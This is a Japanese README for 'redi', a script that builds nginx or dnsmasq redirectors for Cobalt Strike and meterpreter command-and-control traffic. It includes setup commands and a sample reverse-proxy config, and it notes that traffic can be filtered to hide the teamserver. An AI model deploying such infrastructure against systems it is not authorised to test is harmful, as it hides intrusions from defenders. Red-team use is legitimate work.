
CobaltStrikeリダイレクタ(nginxリバースプロキシ、letsencrypt)をセットアップするための自動化スクリプト
自動リダイレクター設定ツール。HTTP RAT(CobaltStrike Beacon、meterpreterなど)およびCobaltStrike DNS Beaconと互換性があります。このスクリプトは、nginxリバースプロキシまたはdnsmasqを使用したDNSプロキシ/フォワーダーのいずれかをセットアップします。HTTPSを選択した場合、letsencrypt certbotを自動的にセットアップし、リダイレクターのドメイン名に対して有効なletsencrypt SSL証明書を取得し、生成された設定を使用してnginxを起動します。
リバースプロキシ方式では、複数のリダイレクターをそれぞれ独自の有効な証明書で設定でき、すべて同じCobaltStrike HTTPSステージャー/リスナーを指すことができます(CobaltStrikeが自己署名/信頼されていない証明書を使用している場合でも)。
また、スクリプトによって生成されたnginx設定を変更して、追加機能を追加することもできます。たとえば、CobaltStrikeの malleable C2プロファイルに一致するトラフィックのみをプロキシし、それ以外の場合は静的ページまたは別のプロキシを提供するように選択できます。設定では、User-Agentヘッダーに元の送信元IPを追加するように変更され、CobaltStrikeのWebログで直接確認できます(下の画像参照)。
設定を調整すれば、BeaconのHTTPSトラフィックをSSLオフロードしてteamserverのHTTPリスナーに送信することも可能です!

git clone https://github.com/taherio/redi.git
cd redi
chmod u+x redi.sh
./redi.sh <リダイレクタードメイン> <teamserver IP/ドメイン> <http/https>
#DNSリダイレクターの場合
./redi.sh <teamserver IP> dns
./redi.sh first.myredirector.ca,second.myredirector.ca,third.myredirector.ca myteamserver.com https
./redi.sh myredirector.ca myteamserver.com https
./redi.sh 192.0.0.1 dns
server {
listen 443 ssl;
server_name myredirector.ca;
ssl on;
ssl_certificate /etc/letsencrypt/live/myredirector.ca/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/myredirector.ca/privkey.pem;
location / {
proxy_pass https://myteamserver.com:443/;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header "User-Agent" "${http_user_agent} - Original IP ${remote_addr}";
}
}